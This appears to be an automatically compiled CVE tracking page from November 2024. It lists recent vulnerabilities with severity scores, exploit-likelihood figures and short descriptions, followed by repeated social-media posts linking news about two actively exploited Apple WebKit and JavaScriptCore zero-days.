##
Updated at UTC 2024-11-21T02:44:39.830893
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2024-44308 | 8.8 | 0.04% | 29 | 1 | 2024-11-20T18:33:20 | The issue was addressed with improved checks. This issue is fixed in Safari 18.1 | |
CVE-2024-44625 | 8.8 | 4.35% | 1 | 1 | 2024-11-20T16:44:13 | Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function | |
CVE-2024-10924 | 9.8 | 0.04% | 3 | 1 | 2024-11-20T15:30:50 | The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress | |
CVE-2024-44309 | None | 0.04% | 27 | 0 | 2024-11-20T00:32:20 | A cookie management issue was addressed with improved state management. This iss | |
CVE-2024-11395 | 8.8 | 0.04% | 5 | 1 | 2024-11-20T00:32:14 | Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote at | |
CVE-2024-0793 | 7.7 | 0.12% | 4 | 0 | 2024-11-19T20:25:31 | A flaw was found in kube-controller-manager. This issue occurs when the initial | |
CVE-2024-43498 | 9.8 | 0.14% | 1 | 0 | 2024-11-19T20:01:04.877000 | .NET and Visual Studio Remote Code Execution Vulnerability | |
CVE-2024-21287 | 7.5 | 0.09% | 7 | 1 | 2024-11-19T18:31:00 | Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain ( | |
CVE-2024-52867 | 8.2 | 0.04% | 4 | 0 | 2024-11-19T18:30:58 | guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build | |
CVE-2024-0012 | 9.8 | 96.61% | 57 | 1 | template | 2024-11-19T17:17:29.723000 | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauth |
CVE-2024-9474 | 7.2 | 97.40% | 51 | 1 | template | 2024-11-19T17:16:40.513000 | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allow |
CVE-2024-11159 | 4.3 | 0.05% | 1 | 1 | 2024-11-19T15:32:55 | Using remote content in OpenPGP encrypted messages can lead to the disclosure of | |
CVE-2024-43602 | 9.9 | 0.05% | 1 | 0 | 2024-11-19T03:40:15.550000 | Azure CycleCloud Remote Code Execution Vulnerability | |
CVE-2024-48510 | 9.8 | 0.06% | 3 | 1 | 2024-11-18T23:41:15 | Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remo | |
CVE-2024-43639 | 9.8 | 0.14% | 3 | 0 | 2024-11-18T22:20:32.157000 | Windows KDC Proxy Remote Code Execution Vulnerability | |
CVE-2023-1419 | 5.9 | 0.09% | 4 | 0 | 2024-11-18T20:08:45 | A script injection vulnerability was found in the Debezium database connector, w | |
CVE-2023-4639 | 7.4 | 0.10% | 4 | 0 | 2024-11-18T20:08:31 | A flaw was found in Undertow, which incorrectly parses cookies with certain valu | |
CVE-2023-6110 | 5.5 | 0.08% | 4 | 0 | 2024-11-18T20:08:26 | A flaw was found in OpenStack. When a user tries to delete a non-existing access | |
CVE-2024-52940 | 7.5 | 0.04% | 1 | 1 | 2024-11-18T18:32:00 | AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inad | |
CVE-2023-0657 | 3.4 | 0.04% | 4 | 0 | 2024-11-18T17:28:40 | Keycloak was found to not properly enforce token types when validating signature | |
CVE-2023-43091 | 9.8 | 0.04% | 4 | 1 | 2024-11-17T15:30:52 | A flaw was found in GNOME Maps, which is vulnerable to a code injection attack v | |
CVE-2020-25720 | 7.5 | 0.05% | 4 | 0 | 2024-11-17T12:30:36 | A vulnerability was found in Samba where a delegated administrator with permissi | |
CVE-2024-49060 | 8.8 | 0.04% | 2 | 1 | 2024-11-15T21:30:53 | Azure Stack HCI Elevation of Privilege Vulnerability | |
CVE-2024-50986 | None | 0.04% | 1 | 1 | 2024-11-15T15:31:04 | An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code | |
CVE-2024-9465 | 9.1 | 94.95% | 10 | 1 | template | 2024-11-15T14:39:34.863000 | An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauth |
CVE-2024-9463 | 7.5 | 96.23% | 9 | 1 | template | 2024-11-15T02:00:01.687000 | An OS command injection vulnerability in Palo Alto Networks Expedition allows an |
CVE-2024-52551 | 8.0 | 0.04% | 1 | 0 | 2024-11-14T22:45:14 | Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does | |
CVE-2024-52552 | 8.0 | 0.04% | 1 | 0 | 2024-11-14T22:45:13 | Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing | |
CVE-2024-49025 | 5.4 | 0.05% | 1 | 1 | 2024-11-14T21:32:11 | Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | |
CVE-2024-8068 | None | 0.04% | 3 | 1 | 2024-11-14T18:30:34 | Privilege escalation to NetworkService Account access in Citrix Session Recordin | |
CVE-2024-50252 | 5.5 | 0.04% | 1 | 0 | 2024-11-14T18:30:33 | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spec | |
CVE-2024-52554 | 8.8 | 0.04% | 1 | 0 | 2024-11-14T15:42:42 | Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier decl | |
CVE-2024-52550 | 8.0 | 0.04% | 1 | 0 | 2024-11-14T15:41:49 | Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.397 | |
CVE-2024-52553 | 8.8 | 0.04% | 1 | 0 | 2024-11-14T15:37:53 | Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier do | |
CVE-2024-52549 | 4.3 | 0.04% | 1 | 0 | 2024-11-14T15:35:55 | Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367. | |
CVE-2024-10979 | 8.8 | 0.04% | 2 | 1 | 2024-11-14T15:32:22 | Incorrect control of environment variables in PostgreSQL PL/Perl allows an unpri | |
CVE-2024-7404 | 6.8 | 0.04% | 1 | 1 | 2024-11-14T15:32:22 | An issue was discovered in GitLab CE/EE affecting all versions starting from 17. | |
CVE-2024-8648 | 6.1 | 0.04% | 1 | 0 | 2024-11-14T15:32:16 | An issue has been discovered in GitLab CE/EE affecting all versions from 16 befo | |
CVE-2024-5917 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:09 | A server-side request forgery in PAN-OS software enables an unauthenticated atta | |
CVE-2024-2552 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:08 | A command injection vulnerability in Palo Alto Networks PAN-OS software enables | |
CVE-2024-9472 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:08 | A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Serie | |
CVE-2024-5918 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:02 | An improper certificate validation vulnerability in Palo Alto Networks PAN-OS so | |
CVE-2024-5919 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:02 | A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Net | |
CVE-2024-5920 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:02 | A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software | |
CVE-2024-8180 | 5.4 | 0.04% | 1 | 1 | 2024-11-14T12:31:02 | An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 be | |
CVE-2024-9693 | 8.6 | 0.04% | 1 | 0 | 2024-11-14T12:31:02 | An issue was discovered in GitLab CE/EE affecting all versions starting from 16. | |
CVE-2024-2551 | None | 0.04% | 1 | 0 | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software e | |
CVE-2024-2550 | None | 0.04% | 1 | 1 | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Al | |
CVE-2024-8535 | 8.8 | 0.04% | 1 | 0 | 2024-11-14T00:31:11 | Authenticated user can access unintended user capabilities in NetScaler ADC and | |
CVE-2024-43093 | 7.8 | 0.25% | 1 | 2 | 2024-11-13T21:31:39 | In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypas | |
CVE-2024-8534 | 5.3 | 0.04% | 1 | 0 | 2024-11-13T20:35:12.293000 | Memory safety vulnerability leading to memory corruption and Denial of Service i | |
CVE-2024-11116 | 4.3 | 0.04% | 1 | 1 | 2024-11-13T18:33:06 | Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 al | |
CVE-2024-11110 | 6.5 | 0.04% | 2 | 1 | 2024-11-13T18:33:05 | Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778. | |
CVE-2024-11111 | 4.3 | 0.04% | 1 | 1 | 2024-11-13T18:33:05 | Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69 | |
CVE-2024-11115 | 8.8 | 0.04% | 1 | 1 | 2024-11-13T18:33:05 | Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 1 | |
CVE-2024-11117 | 4.3 | 0.04% | 2 | 1 | 2024-11-13T18:31:59 | Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778. | |
CVE-2024-8069 | 8.8 | 0.04% | 3 | 1 | 2024-11-13T18:31:59 | Limited remote code execution with privilege of a NetworkService Account access | |
CVE-2014-2120 | 5.4 | 0.25% | 2 | 1 | 2024-11-13T18:31:52 | Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adapt | |
CVE-2021-26086 | 5.3 | 97.11% | 2 | 1 | template | 2024-11-13T17:39:36.637000 | Affected versions of Atlassian Jira Server and Data Center allow remote attacker |
CVE-2024-47574 | 7.8 | 0.04% | 2 | 1 | 2024-11-13T12:32:16 | A authentication bypass using an alternate path or channel in Fortinet FortiClie | |
CVE-2024-11113 | 8.8 | 0.04% | 1 | 1 | 2024-11-13T00:30:48 | Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed | |
CVE-2024-11112 | 7.5 | 0.04% | 1 | 1 | 2024-11-13T00:30:48 | Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allow | |
CVE-2024-11114 | 8.4 | 0.04% | 1 | 1 | 2024-11-13T00:30:48 | Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0 | |
CVE-2023-50176 | 7.5 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 thr | |
CVE-2024-26011 | 5.3 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | A missing authentication for critical function in Fortinet FortiManager version | |
CVE-2024-40592 | 7.6 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | An improper verification of cryptographic signature vulnerability [CWE-347] in F | |
CVE-2024-33505 | 5.6 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4 | |
CVE-2024-36513 | 8.3 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | A privilege context switching error vulnerability [CWE-270] in FortiClient Windo | |
CVE-2023-47543 | 5.4 | 0.04% | 1 | 0 | 2024-11-12T21:31:01 | An authorization bypass through user-controlled key vulnerability [CWE-639] in F | |
CVE-2024-32117 | 4.9 | 0.04% | 1 | 1 | 2024-11-12T21:31:01 | An improper limitation of a pathname to a restricted directory ('Path Traversal' | |
CVE-2024-23666 | 7.5 | 0.04% | 1 | 1 | 2024-11-12T21:30:54 | A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigD | |
CVE-2024-36507 | 7.3 | 0.05% | 1 | 0 | 2024-11-12T21:30:53 | A untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions | |
CVE-2024-31496 | 6.7 | 0.04% | 1 | 1 | 2024-11-12T21:30:52 | A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager v | |
CVE-2024-33510 | 4.3 | 0.04% | 1 | 1 | 2024-11-12T21:30:52 | An improper neutralization of special elements in output used by a downstream co | |
CVE-2024-36509 | 4.2 | 0.04% | 1 | 0 | 2024-11-12T21:30:52 | An exposure of sensitive system information to an unauthorized control sphere vu | |
CVE-2023-44255 | 4.1 | 0.04% | 1 | 0 | 2024-11-12T21:30:52 | An exposure of sensitive information to an unauthorized actor [CWE-200] in Forti | |
CVE-2024-32116 | 5.1 | 0.04% | 1 | 0 | 2024-11-12T21:30:52 | Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManag | |
CVE-2024-35274 | 2.3 | 0.04% | 1 | 0 | 2024-11-12T21:30:52 | An improper limitation of a pathname to a restricted directory ('Path Traversal' | |
CVE-2024-32118 | 6.7 | 0.04% | 1 | 0 | 2024-11-12T21:30:52 | Multiple improper neutralization of special elements used in an OS command ('OS | |
CVE-2024-49019 | 7.8 | 0.05% | 3 | 0 | 2024-11-12T18:31:06 | Active Directory Certificate Services Elevation of Privilege Vulnerability | |
CVE-2024-43451 | 6.5 | 0.47% | 10 | 1 | 2024-11-12T18:31:05 | NTLM Hash Disclosure Spoofing Vulnerability | |
CVE-2024-49039 | 8.8 | 1.23% | 7 | 1 | 2024-11-12T18:31:00 | Windows Task Scheduler Elevation of Privilege Vulnerability | |
CVE-2024-49040 | 7.5 | 0.09% | 3 | 1 | 2024-11-12T18:31:00 | Microsoft Exchange Server Spoofing Vulnerability | |
CVE-2024-43450 | 7.5 | 0.13% | 1 | 0 | 2024-11-12T18:30:58 | Windows DNS Spoofing Vulnerability | |
CVE-2024-51567 | 10.0 | 40.13% | 1 | 2 | 2024-11-08T21:34:54 | upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before | |
CVE-2024-5910 | 9.8 | 97.10% | 7 | 2 | template | 2024-11-08T21:33:52 | Missing authentication for a critical function in Palo Alto Networks Expedition |
CVE-2020-11921 | 8.8 | 0.04% | 1 | 0 | 2024-11-08T18:31:57 | An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetoo | |
CVE-2024-51998 | 8.6 | 0.04% | 1 | 0 | 2024-11-08T13:55:32 | ### Summary The validation for the file URI scheme falls short, and results in | |
CVE-2024-51987 | 5.4 | 0.04% | 1 | 0 | 2024-11-08T13:55:27 | ### Impact HTTP Clients created by `AddUserAccessTokenHttpClient` may use a diff | |
CVE-2024-47072 | 7.5 | 0.04% | 1 | 0 | 2024-11-08T13:55:23 | ### Impact The vulnerability may allow a remote attacker to terminate the applic | |
CVE-2024-40715 | 7.7 | 0.07% | 1 | 0 | 2024-11-07T18:31:30 | A vulnerability in Veeam Backup & Replication Enterprise Manager has been identi | |
CVE-2024-50340 | 7.3 | 0.05% | 1 | 1 | 2024-11-06T23:39:52 | ### Description When the `register_argc_argv` php directive is set to `on` , an | |
CVE-2024-20536 | 8.8 | 0.04% | 1 | 1 | 2024-11-06T18:31:17 | A vulnerability in a REST API endpoint and web-based management interface of Cis | |
CVE-2024-20484 | 7.5 | 0.04% | 1 | 1 | 2024-11-06T18:31:17 | A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco | |
CVE-2024-10827 | 8.8 | 0.04% | 1 | 0 | 2024-11-06T18:31:17 | Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remo | |
CVE-2024-10826 | 8.8 | 0.04% | 1 | 0 | 2024-11-06T18:31:17 | Use after free in Family Experiences in Google Chrome on Android prior to 130.0. | |
CVE-2024-20418 | 10.0 | 0.04% | 1 | 0 | 2024-11-06T18:31:11 | A vulnerability in the web-based management interface of Cisco Unified Industria | |
CVE-2024-42509 | 9.8 | 0.04% | 3 | 0 | 2024-11-06T18:31:09 | Command injection vulnerability in the underlying CLI service could lead to unau | |
CVE-2024-47460 | 9.1 | 0.04% | 1 | 0 | 2024-11-06T18:31:09 | Command injection vulnerability in the underlying CLI service could lead to unau | |
CVE-2024-10914 | 8.1 | 16.93% | 6 | 1 | template | 2024-11-06T15:30:46 | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up |
CVE-2024-49767 | 7.5 | 0.06% | 1 | 0 | 2024-11-05T21:35:24 | Applications using Werkzeug to parse `multipart/form-data` requests are vulnerab | |
CVE-2024-8934 | 6.5 | 0.04% | 1 | 0 | 2024-10-31T15:31:04 | A local user with administrative access rights can enter specialy crafted values | |
CVE-2024-44252 | 7.1 | 0.04% | 1 | 0 | 2024-10-30T18:30:48 | A logic issue was addressed with improved file handling. This issue is fixed in | |
CVE-2024-38821 | 9.1 | 0.04% | 1 | 1 | 2024-10-28T17:59:30 | Spring WebFlux applications that have Spring Security authorization rules on sta | |
CVE-2024-49766 | None | 0.04% | 1 | 0 | 2024-10-26T03:47:04 | On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `// | |
CVE-2024-47575 | 9.8 | 5.18% | 7 | 1 | 2024-10-23T15:31:52 | A missing authentication for critical function in FortiManager 7.6.0, FortiManag | |
CVE-2024-21216 | 9.8 | 0.15% | 2 | 0 | 2024-10-17T15:31:09 | Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware | |
CVE-2024-4131 | 7.8 | 0.04% | 1 | 1 | 2024-10-11T18:32:57 | A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a lo | |
CVE-2024-43601 | 7.1 | 0.05% | 1 | 0 | 2024-10-08T18:33:29 | Visual Studio Code for Linux Remote Code Execution Vulnerability | |
CVE-2024-38813 | 7.5 | 0.09% | 19 | 1 | 2024-10-02T15:31:39 | The vCenter Server contains a privilege escalation vulnerability. A malicious ac | |
CVE-2024-38812 | 9.8 | 0.09% | 19 | 1 | 2024-10-02T14:16:47.610000 | The vCenter Server contains a heap-overflow vulnerability in the implementation | |
CVE-2022-46751 | 8.2 | 0.15% | 1 | 0 | 2024-09-30T13:35:28 | Improper Restriction of XML External Entity Reference, XML Injection (aka Blind | |
CVE-2024-47062 | 8.8 | 0.05% | 1 | 1 | template | 2024-09-20T22:07:52 | # Security Advisory: Multiple Vulnerabilities in Navidrome ## Summary Navidrom |
CVE-2024-45409 | 10.0 | 16.41% | 1 | 1 | template | 2024-09-16T15:29:27 | Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature |
CVE-2024-40711 | 9.8 | 96.69% | 1 | 2 | template | 2024-09-09T18:30:30 | A deserialization of untrusted data vulnerability with a malicious payload can a |
CVE-2024-42057 | 8.1 | 0.09% | 2 | 1 | 2024-09-03T03:30:40 | A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series f | |
CVE-2024-39717 | 6.6 | 0.21% | 2 | 1 | 2024-08-27T18:31:36 | The Versa Director GUI provides an option to customize the look and feel of the | |
CVE-2024-5034 | 8.8 | 0.04% | 1 | 1 | 2024-08-01T15:33:03 | The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places | |
CVE-2017-0199 | 7.8 | 97.50% | 1 | 26 | 2024-07-24T18:32:16 | Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, | |
CVE-2024-4577 | 9.8 | 96.32% | 1 | 1 | template | 2024-06-21T21:35:02 | In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, wh |
CVE-2024-35250 | 7.8 | 0.04% | 2 | 2 | 2024-06-20T18:35:10 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | |
CVE-2024-30103 | 8.8 | 0.09% | 1 | 0 | 2024-06-11T18:30:56 | Microsoft Outlook Remote Code Execution Vulnerability | |
CVE-2024-30051 | 7.8 | 0.08% | 1 | 1 | 2024-05-16T21:31:58 | Windows DWM Core Library Elevation of Privilege Vulnerability | |
CVE-2024-4351 | 8.8 | 0.05% | 1 | 1 | 2024-05-16T12:30:29 | The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of d | |
CVE-2024-3400 | 9.8 | 96.41% | 1 | 1 | template | 2024-04-29T05:02:31 | A command injection vulnerability in the GlobalProtect feature of Palo Alto Netw |
CVE-2023-27944 | 8.6 | 0.06% | 1 | 0 | 2024-04-11T21:19:47 | This issue was addressed with a new entitlement. This issue is fixed in macOS Ve | |
CVE-2024-26229 | 7.8 | 0.04% | 2 | 1 | 2024-04-09T18:30:35 | Windows CSC Service Elevation of Privilege Vulnerability | |
CVE-2023-3519 | 9.8 | 96.55% | 1 | 15 | 2024-04-04T06:17:12 | Unauthenticated remote code execution | |
CVE-2023-32414 | 8.6 | 0.05% | 1 | 0 | 2024-04-04T05:08:19 | The issue was addressed with improved checks. This issue is fixed in macOS Ventu | |
CVE-2023-27997 | 9.8 | 9.72% | 2 | 1 | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an | |
CVE-2024-20767 | 8.2 | 11.07% | 2 | 4 | template | 2024-03-18T12:31:54 | ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Acce |
CVE-2023-36328 | 9.8 | 0.16% | 1 | 1 | 2024-03-07T18:30:26 | Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beb | |
CVE-2023-4911 | 7.8 | 17.23% | 1 | 1 | 2024-03-02T05:06:50 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi | |
CVE-2024-1212 | 10.0 | 91.88% | 4 | 2 | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma | |
CVE-2024-23113 | 9.8 | 1.84% | 5 | 1 | 2024-02-15T15:30:37 | A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 | |
CVE-2023-20198 | 10.0 | 88.58% | 2 | 1 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
CVE-2023-20273 | 7.2 | 7.47% | 2 | 1 | 2024-02-03T05:06:23 | A vulnerability in the web UI feature of Cisco IOS XE Software could allow an au | |
CVE-2020-3259 | 7.5 | 2.71% | 1 | 0 | 2023-08-16T18:30:19 | A vulnerability in the web services interface of Cisco Adaptive Security Applian | |
CVE-2021-40539 | 9.8 | 97.47% | 4 | 1 | template | 2023-08-08T15:31:21 | Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to RES |
CVE-2021-4043 | 5.5 | 0.09% | 1 | 9 | 2023-06-05T05:00:42 | NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0. | |
CVE-2019-16278 | 9.8 | 97.42% | 1 | 15 | template | 2023-03-23T18:30:31 | Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 |
CVE-2022-42475 | 9.8 | 27.42% | 2 | 1 | 2023-02-02T05:01:14 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th | |
CVE-2021-27860 | 8.8 | 28.52% | 4 | 1 | 2023-02-01T05:06:42 | A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVP | |
CVE-2019-12900 | 9.8 | 1.96% | 1 | 0 | 2023-01-27T05:02:50 | BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write | |
CVE-2020-12271 | 9.8 | 1.67% | 1 | 0 | 2023-01-27T05:02:29 | A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-0 | |
CVE-2024-10224 | 0 | 0.05% | 2 | 1 | N/A | ||
CVE-2024-11394 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2024-11393 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2024-31449 | 0 | 0.04% | 1 | 1 | N/A | ||
CVE-2024-40590 | 0 | 0.00% | 1 | 1 | N/A | ||
CVE-2024-10240 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2021-41277 | 0 | 97.29% | 2 | 1 | template | N/A | |
CVE-2024-45819 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2024-27864 | 0 | 0.00% | 1 | 0 | N/A |
updated 2024-11-20T18:33:20
29 posts
1 repos
iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Oha. Eigentlich hätte ich mit iOS 18.2 von Apple gerechnet. Anstelle schieben die jetzt 18.1.1 mit einem super wichtigen Sicherheitsupdate (CVE-2024-44308) raus, dass ein von Google entdecktes zeroday im WebKit fixen soll.
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Oha. Eigentlich hätte ich mit iOS 18.2 von Apple gerechnet. Anstelle schieben die jetzt 18.1.1 mit einem super wichtigen Sicherheitsupdate (CVE-2024-44308) raus, dass ein von Google entdecktes zeroday im WebKit fixen soll.
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
